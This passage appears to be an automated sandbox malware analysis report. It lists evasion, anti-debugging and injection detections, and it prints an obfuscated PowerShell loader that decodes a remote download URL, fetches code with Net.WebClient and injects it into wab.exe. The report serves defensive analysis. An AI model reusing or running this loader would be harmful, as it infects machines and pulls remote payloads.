Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 4BB833B

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20B60000 memory reserve \| memory write watch	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9921			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9853			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416

Thread sleep count: 9853 > 30

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: wab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000009.00000002.882938896282.0000021672499000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllat
Source: powershell.exe, 0000000D.00000002.878917749751.0000000008746000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 15_2_22C95380 CheckRemoteDebuggerPresent,

15_2_22C95380

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 13_2_02CED8D0 LdrInitializeThunk,LdrInitializeThunk,

13_2_02CED8D0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe

Code function: 16_2_007E2A7E GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

16_2_007E2A7E

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E3450 SetUnhandledExceptionFilter,		16_2_007E3450
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E32C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		16_2_007E32C0

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_2680.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6840, type: MEMORYSTR

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EDFB78			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"	Jump to behavior
